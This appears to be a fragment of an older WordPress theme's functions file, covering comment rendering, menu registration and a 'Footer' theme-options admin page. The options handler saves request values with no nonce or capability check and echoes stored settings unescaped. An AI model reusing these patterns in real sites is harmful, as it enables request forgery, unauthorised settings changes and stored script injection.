		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
